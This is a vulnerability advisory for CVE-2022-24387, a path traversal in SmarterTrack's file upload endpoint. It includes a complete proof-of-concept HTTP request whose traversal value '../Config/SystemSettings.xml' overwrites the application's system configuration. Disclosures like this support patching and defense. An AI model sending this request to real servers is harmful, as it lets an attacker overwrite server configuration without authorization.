CVE-2022-24387 - Path traversal in upload :: WBSec.nl

Advisory

Upgrade to the latest version of SmarterTrack
Technical details

By sending a POST request it was possible to upload or overwrite files in the applications webroot/app_data. Changing the name parameter allows an attacker to execute a path traversal attack.
POST /FileStorageUpload.ashx?folder=JmyciQLgWCiWph8GUboif0PUAb8bMw6aT1K4QShnrOfTqYytXk%2fB4GmSIcUhECmBwIryRnLLjiQkana0uaxYLDTq9vpisghs&token=a443a69146634d6b8e6c7d5a649aa6be HTTP/1.1
Host: test.local:9996
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local:9996/Management/Tickets/frmTicket.aspx?ticketid=11
Content-Type: multipart/form-data; boundary=---------------------------41325027787306344272908251903
Content-Length: 1803
Origin: http://test.local:9996
Connection: close
Cookie: uidut=1; ----SNIP----

-----------------------------41325027787306344272908251903
Content-Disposition: form-data; name="name"

../Config/SystemSettings.xml
-----------------------------41325027787306344272908251903
Content-Disposition: form-data; name="file"; filename="SystemSettings.xml"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="utf-8"?>
<SystemSettings>
  <GeneralSettings>
    <DatabaseType>SQLSERVER</DatabaseType>
    <UseWindowsAuthentication>True</UseWindowsAuthentication>
    <DBPrefix>st_</DBPrefix>
    <ConnectionStringEnc>rrxpfuka4iM2rOkA2LMIrlvoeYUoVDWhZ6znuDffiVh4egXU9u330OQuAug2iO+8cnm5venRtfww0Ftkj/31ra+cxqAJupzAPinB2ZGEfxFWthq+JXcNKEUeU5o/BEe1TRELFyui9eC4/cvybYu6Bo12GoIMa3Otu0eCqpUz5p0QbYtClmhyWJKCx0FzJHZC</ConnectionStringEnc>
    <UniqueInstallID>750510454ca442f0b65cd9444d20a8e0</UniqueInstallID>
    <EnablePerSessionQueryLogging>True</EnablePerSessionQueryLogging>
    <EnablePerSessionQueryLoggingBasic>True</EnablePerSessionQueryLoggingBasic>
    <EnableLockTracing>True</EnableLockTracing>
    <EnablePopDupDetection>False</EnablePopDupDetection>
    <EnableCacheTracing>True</EnableCacheTracing>
    <SendOnAutoClose>False</SendOnAutoClose>
    <RunAutoClose>True</RunAutoClose>
    <HttpAbsolutePath>http://localhost:9996/</HttpAbsolutePath>
    <ServerName>WIN-E87FQ6TFQT4</ServerName>
    <SmtpUseSSL>False</SmtpUseSSL>
    <AuthenticateSSL>False</AuthenticateSSL>
    <SmtpUseTLS>False</SmtpUseTLS>
    <EnableSmtpAuth>False</EnableSmtpAuth>
    <SmtpMigrateDone>True</SmtpMigrateDone>
    <Content_LastUpdatedUTC7>2021-10-24 12:11:05Z</Content_LastUpdatedUTC7>
    <Content_ProductLink7>https://www.smartertools.com/smartertrack/online-help-desk</Content_ProductLink7>
    <Content_KeywordLink7>https://www.smartertools.com/smartertrack/online-help-desk</Content_KeywordLink7>
    <Content_KeywordText7>Help Desk Software</Content_KeywordText7>
    <Content_CompanyLink7>http://www.smartertools.com/</Content_CompanyLink7>
    <Content_CompanyText7>SmarterTools Inc.</Content_CompanyText7>
    <Content_BaseHelpLink7>https://help.smartertools.com/smartertrack/current/</Content_BaseHelpLink7>
  </GeneralSettings>
</SystemSettings>
-----------------------------41325027787306344272908251903--